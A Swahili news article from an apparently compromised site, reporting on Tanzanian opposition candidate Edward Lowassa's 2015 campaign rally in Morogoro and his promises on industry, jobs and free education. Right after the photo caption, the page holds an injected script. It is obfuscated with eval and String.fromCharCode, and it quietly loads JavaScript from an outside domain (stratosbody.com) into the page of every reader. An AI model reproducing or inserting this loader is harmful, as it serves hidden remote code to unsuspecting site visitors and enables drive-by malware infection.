Recent Comments

Lowassa ahimiza wafuasi wampigie kura

By Baraka Bitariho Sep 16, 2015
<p>Mgombea urais wa Ukawa, aliyekuwa Waziri Mkuu, Edward Lowassa</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mgombea urais wa Ukawa, aliyekuwa Waziri Mkuu, Edward Lowassa
Mgombea urais wa Ukawa, aliyekuwa Waziri Mkuu, Edward Lowassa

MGOMBEA wa urais wa Jamhuri wa Muungano wa Tanzania kupitia Chadema, Edward Lowassa, amesema haitoshi kwa watu kuendelea kufurika katika mikutano yake pasipo kutia nia ya kumpigia kura ili aweze kuwa Rais wa Serikali ya Awamu ya Tano.

Lowassa anayeungwa mkono na vyama vingine vitatu vya CUF, NCCR- Mageuzi na NLD, alisema umati wa watu wanaojitokeza kumsikiliza kila mahali ikiwemo Morogoro Mjini hakutoshi iwapo hawataweza kumpigia kura nyingi za kuingia madarakani Oktoba 25, mwaka huu.

Lowassa aliyekuwa Waziri Mkuu wa kwanza katika Serikali ya Awamu ya Nne na kulazimika kuachia madaraka mapema mwaka 2008, alihutubia takribani kwa dakika kumi na baadaye kuwakaribisha na kuwatambulisha wagombea wa ubunge wa Jimbo la Morogoro Mjini na madiwani wa Kata mbalimbali ili kuwaombea kura kwa wananchi.

Alianza ziara yake kwa kuwahutubia wananchi wa kata ya Dumila, Turiani na kuwasili mjini Morogoro jioni ya saa kumi akiambatana na aliyekuwa Waziri Mkuu wa Serikali ya Awamu ya Tatu, Frederick Sumaye ambaye kama Lowassa, amejiengua CCM baada ya kukataliwa kuwania urais kwa tiketi ya chama hicho tawala.

Akihubutia katika mkutano huo uliofanyika katika uwanja wa Shule ya Msingi Kiwanja cha Ndege, Manispaa ya Morogoro, alisema mahudhurio hayo na kumshangilia huko kwa wingi kuonekane pia katika sanduku la kura.

Pia alitumia muda huo kuelezea azma yake endapo wananchi watamchagua kuwa Rais wa Tanzania, ataangalia namna ya kufufua viwanda vya Morogoro na ikiwezekana kuanzisha vipya ili kuwezesha upatikanaji wa ajira na kuuza bidhaa ghafi nje badala ya kuuza malighafi kama ilivyo kwa sasa.

Alisema, si dhambi viwanda kuendeshwa na serikali kwa kuwa jambo hilo linafanyika hata katika nchi nyingine za Ulaya na kutolea mfano Ufaransa ambako baadhi ya viwanda na mabenki yanamilikiwa na serikali.

Hivyo aliwataka wananchi kuwapigia kura wagombea wa Chadema kwa nafasi ya udiwani, ubunge ili aweza kupata timu atakayofanya nayo kazi endapo atachaguliwa kuwa rais.

Pamoja na hayo, alisema serikali yake atakayoiunda itakuwa rafiki wa mama lishe, bodaboda na wamachinga na kwamba ataanzisha benki itakayoshughulikia makundi hayo.

Pia alisema serikali yake itasimamia uboreshaji wa elimu, maslahi ya walimu na kutoa elimu bure kuanzia darasa la kwanza hadi chuo kikuu na kwamba endapo ataingia madarakani wanafunzi wote watasomba bure bila kulipa michango.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com